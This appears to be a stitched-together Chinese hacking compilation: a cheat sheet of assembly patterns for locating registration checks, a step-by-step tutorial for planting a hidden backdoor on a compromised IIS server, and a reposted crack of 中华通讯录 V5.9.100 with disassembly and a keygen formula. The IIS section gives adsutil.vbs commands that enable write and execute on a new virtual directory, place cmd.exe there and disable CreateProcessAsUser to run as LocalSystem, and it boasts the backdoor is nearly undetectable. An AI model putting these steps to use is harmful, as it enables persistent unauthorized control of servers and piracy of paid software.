1(最常用)(??????代表具体的地址,下同)
  mov eax [      ]
  mov edx [      ]
  call  00??????  关键call
  test eax eax
  jz(jnz)  或 jne(je)  关键跳转

2(最常用)
moe eax [     ]
mov edx [     ]
call  00??????  关键call
jne(je)     关键跳转

3  mov eax  [     ]
    mov edx  [     ]
    cmp  eax,edx
    jnz(jz)

4  lea  edi  [      ]
    lea  esi   [      ]
    repz empsd
    jz

5 mov eax [    ]
   mov edx [    ]
   call  00??????
  seta (setnz) al (bl,el......)

6mov  eax [      ]
  mov  edx [      ]
  call  00??????
  test eax  eax
  seta (setnz) bl,cl...
  
7  call  00??????   
   push eax (ebx,ecx)
   ......
   ......
   call  00??????
   pop eax (ebx,ecx...)
   test eax eax
   jz(jnz)

IIS是比较流行的www服务器，设置不当漏洞就很多。入侵iis服务器后留下后门，以后就可以随时控制。一般的后门程序都是打开一个特殊的端口来监听，比如有nc,ntlm,rnc等等都是以一种类telnet的方式在服务器端监听远程的连接控制。不过一个比较防范严密的www站点（他们的管理员吃了苦头后）一般通过防火墙对端口进行限制，这样除了管理员开的端口外，其他端口就不能连接了。但是80端口是不可能关闭的（如果管理员没有吃错药）。那么我们可以通过在80端口留后门，来开启永远的后门。

　　当IIS启动CGI应用程序时，缺省用CreateProcessAsUser API来创建该CGI的新Process,该程序的安全上下文就由启动该CGI的用户决定。一般匿名用户都映射到IUSR_computername这个账号，当然可以由管理员改为其他的用户。或者由浏览器提供一个合法的用户。两者的用户的权限都是比较低，可能都属于guest组的成员。其实我们可以修改iis开启CGI的方式，来提高权限。我们来看iis主进程本身是运行在localsystem账号下的，所以我们就可以得到最高localsystem的权限。

　　入侵web服务器后，一般都可以绑定一个cmd到一个端口来远程控制该服务器。这时可以有GUI的远程控制，比如3389，或者类telnet text方式的控制，比如rnc。nc肯定是可以用的,其实这也足够了。

　　1. telnet到服务器

　　2. cscript.exe adsutil.vbs enum w3svc/1/root

KeyType : (STRING) "IIsWebVirtualDir"
AppRoot : (STRING) "/LM/W3SVC/1/ROOT"
AppFriendlyName : (STRING) "默认应用程序"
AppIsolated : (INTEGER) 2
AccessRead : (BOOLEAN) True
AccessWrite : (BOOLEAN) False
AccessExecute : (BOOLEAN) False
AccessScript : (BOOLEAN) True
AccessSource : (BOOLEAN) False
AccessNoRemoteRead : (BOOLEAN) False
AccessNoRemoteWrite : (BOOLEAN) False
AccessNoRemoteExecute : (BOOLEAN) False
AccessNoRemoteScript : (BOOLEAN) False
HttpErrors : (LIST) (32 Items)
"400,*,FILE,C:WINNThelpiisHelpcommon400.htm"
"401,1,FILE,C:WINNThelpiisHelpcommon401-1.htm"
"401,2,FILE,C:WINNThelpiisHelpcommon401-2.htm"
"401,3,FILE,C:WINNThelpiisHelpcommon401-3.htm"
"401,4,FILE,C:WINNThelpiisHelpcommon401-4.htm"
"401,5,FILE,C:WINNThelpiisHelpcommon401-5.htm"
"403,1,FILE,C:WINNThelpiisHelpcommon403-1.htm"
"403,2,FILE,C:WINNThelpiisHelpcommon403-2.htm"
"403,3,FILE,C:WINNThelpiisHelpcommon403-3.htm"
"403,4,FILE,C:WINNThelpiisHelpcommon403-4.htm"
"403,5,FILE,C:WINNThelpiisHelpcommon403-5.htm"
"403,6,FILE,C:WINNThelpiisHelpcommon403-6.htm"
"403,7,FILE,C:WINNThelpiisHelpcommon403-7.htm"
"403,8,FILE,C:WINNThelpiisHelpcommon403-8.htm"
"403,9,FILE,C:WINNThelpiisHelpcommon403-9.htm"
"403,10,FILE,C:WINNThelpiisHelpcommon403-10.htm"
"403,11,FILE,C:WINNThelpiisHelpcommon403-11.htm"
"403,12,FILE,C:WINNThelpiisHelpcommon403-12.htm"
403,13,FILE,C:WINNThelpiisHelpcommon403-13.htm"
"403,15,FILE,C:WINNThelpiisHelpcommon403-15.htm"
"403,16,FILE,C:WINNThelpiisHelpcommon403-16.htm"
"403,17,FILE,C:WINNThelpiisHelpcommon403-17.htm"
"404,*,FILE,C:WINNThelpiisHelpcommon404b.htm"
"405,*,FILE,C:WINNThelpiisHelpcommon405.htm"
"406,*,FILE,C:WINNThelpiisHelpcommon406.htm"
"407,*,FILE,C:WINNThelpiisHelpcommon407.htm"
"412,*,FILE,C:WINNThelpiisHelpcommon412.htm"
"414,*,FILE,C:WINNThelpiisHelpcommon414.htm"
"500,12,FILE,C:WINNThelpiisHelpcommon500-12.htm"
"500,13,FILE,C:WINNThelpiisHelpcommon500-13.htm"
"500,15,FILE,C:WINNThelpiisHelpcommon500-15.htm"
"500,100,URL,/iisHelp/common/500-100.asp"

FrontPageWeb : (BOOLEAN) True
Path : (STRING) "c:inetpubwwwroot"
AccessFlags : (INTEGER) 513
[/w3svc/1/root/localstart.asp]
[/w3svc/1/root/_vti_pvt]
[/w3svc/1/root/_vti_log]
[/w3svc/1/root/_private]
[/w3svc/1/root/_vti_txt]
[/w3svc/1/root/_vti_script]
[/w3svc/1/root/_vti_cnf]
[/w3svc/1/root/_vti_bin]

　　不要告诉我你不知道上面的输出是什么！！！！

　　现在我们心里已经有底了，是不是！呵呵 管理员要倒霉了


　　3. mkdir c:inetpubwwwrootdir1
　　4. cscript.exe mkwebdir.vbs -c MyComputer -w "Default Web Site" -v "Virtual Dir1","c:inetpubwwwrootdir1"

　　这样就建好了一个虚目录：Virtual Dir1

　　你可以用 1 的命令看一下

　　5. 接下来要改变一下Virtual Dir1的属性为execute

　　cscript.exe adsutil.vbs set w3svc/1/root/Virtual Dir1/accesswrite "true" -s:
　　cscript.exe adsutil.vbs set w3svc/1/root/Virtual Dir1/accessexecute "true" -s:

　　现在你已经可以upload 内容到该目录，并且可以运行。你也可以把cmd.exe net.exe直接拷贝到虚拟目录的磁盘目录中。

　　6. 以下命令通过修改iis metabase 来迫使iis以本身的安全环境来创建新的CGI process

　　Cscript adsutil.vbs set /w3svc/1/root/[your directory]/createprocessasuser false

　　注释：cscript windows script host.

　　adsutil.vbs windows iis administration script

　　后面是 iis metabase path

　　这样的后门几乎是无法查出来的，除非把所有的虚目录察看一遍（如果管理员写好了遗书，那他就去杳吧！）

[转帖]中华通讯录 V5.9.100算法分析


作者:小子贼野
转贴自：一蓑烟雨

【文章作者】: 小子贼野[D.4s][DCG]
【软件名称】: 中华通讯录 V5.9.100
【下载地址】: http://www.skycn.com/soft/12563.html#download
【加壳方式】: Aspck
【保护方式】: 注册码
【更新时间】:2007-06-12 09:38:45
【软件介绍】:中华通讯录是一款实用的通讯录软件，软件界面采用WINXP风格，功能完善，最多能够容纳十万条通讯记录，新版本加强了搜索功能，用户不但可以通过姓名搜索，还可以按邮箱，手机号码，妮称，等项进行查询，功能非常强大。新版本增加了企业通讯录管理信息，用户可以对企业员工进行详细管理，方便易用。增加了新的皮肤，修正了换肤功能的BUG.启动时需要输入密码，使其它人不能看到你的通讯资料，让你的信息更安全。查询栏让你很快找到你的联系人。支持增加分类，添加，删除信息。
    最新版本：V5.5Build
对代码进行了优化，增强了软件功能。
    最新版本：V5.4Build
修正了企业通讯录数据报错BUG,增加了功能。
    最新版本：V5.3Build
修正了企业通讯录的两个BUG,功能有所增强，对打印功能做了修改。
**********************************************************************************************

[Copy to clipboard] [ - ]CODE:
005646D1  |.  55                 push ebp
005646D2  |.  68 9C475600        push unpack.0056479C
005646D7  |.  64:FF30            push dword ptr fs:[eax]
005646DA  |.  64:8920            mov dword ptr fs:[eax],esp
005646DD  |.  33C0               xor eax,eax
005646DF  |.  8945 F4            mov [local.3],eax
005646E2  |.  8D55 F8            lea edx,[local.2]
005646E5  |.  8B45 FC            mov eax,[local.1]
005646E8  |.  8B80 140A0000      mov eax,dword ptr ds:[eax+A14]
005646EE  |.  E8 8534EDFF        call unpack.00437B78
005646F3  |.  8B45 F8            mov eax,[local.2]
005646F6  |.  E8 35FBE9FF        call unpack.00404230
005646FB  |.  8BD8               mov ebx,eax
005646FD  |.  85DB               test ebx,ebx
005646FF  |.  7E 2E              jle short unpack.0056472F
00564701  |.  BE 01000000        mov esi,1
00564706  |>  8D45 F0            /lea eax,[local.4]
00564709  |.  50                 |push eax
0056470A  |.  B9 01000000        |mov ecx,1
0056470F  |.  8BD6               |mov edx,esi
00564711  |.  8B45 F8            |mov eax,[local.2]
00564714  |.  E8 1FFDE9FF        |call unpack.00404438
00564719  |.  8B45 F0            |mov eax,[local.4]
0056471C  |.  E8 D3FCE9FF        |call unpack.004043F4
00564721  |.  8A00               |mov al,byte ptr ds:[eax]
00564723  |.  25 FF000000        |and eax,0FF
00564728  |.  0145 F4            |add [local.3],eax
0056472B  |.  46                 |inc esi
0056472C  |.  4B                 |dec ebx
0056472D  |.^ 75 D7              \jnz short unpack.00564706        ;  以上循环是取机器码的Ascii
0056472F  |>  8D55 EC            lea edx,[local.5]
00564732  |.  8B45 FC            mov eax,[local.1]
00564735  |.  8B80 340A0000      mov eax,dword ptr ds:[eax+A34]
0056473B  |.  E8 3834EDFF        call unpack.00437B78
00564740  |.  8B45 EC            mov eax,[local.5]
00564743  |.  E8 005BEAFF        call unpack.0040A248
00564748  |.  8B55 F4            mov edx,[local.3]
0056474B  |.  81C2 FC7E1200      add edx,127EFC                    ;  机器码的Ascii+$127EFC
00564751  |.  81C2 9FE46400      add edx,unpack.0064E49F           ;  再加$64E49F
00564757  |.  3BC2               cmp eax,edx                       ;  比较，EDX中十进制即为真码
00564759  |.  75 19              jnz short unpack.00564774         ;  关键跳
0056475B  |.  B3 01              mov bl,1
0056475D  |.  B8 E0B65700        mov eax,unpack.0057B6E0
00564762  |.  8B55 F8            mov edx,[local.2]
00564765  |.  E8 9AF8E9FF        call unpack.00404004
0056476A  |.  8B45 F4            mov eax,[local.3]
0056476D  |.  A3 E4B65700        mov dword ptr ds:[57B6E4],eax
00564772  |.  EB 02              jmp short unpack.00564776
00564774  |>  33DB               xor ebx,ebx
00564776  |>  33C0               xor eax,eax
00564778  |.  5A                 pop edx
00564779  |.  59                 pop ecx
0056477A  |.  59                 pop ecx
0056477B  |.  64:8910            mov dword ptr fs:[eax],edx
0056477E  |.  68 A3475600        push unpack.005647A3
00564783  |>  8D45 EC            lea eax,[local.5]
00564786  |.  E8 25F8E9FF        call unpack.00403FB0
0056478B  |.  8D45 F0            lea eax,[local.4]
0056478E  |.  E8 1DF8E9FF        call unpack.00403FB0
00564793  |.  8D45 F8            lea eax,[local.2]
00564796  |.  E8 15F8E9FF        call unpack.00403FB0
0056479B  \.  C3                 retn
**********************************************************************************************
算法总结：

取机器码Ascii后+$127EFC+$64E49F就是注册码了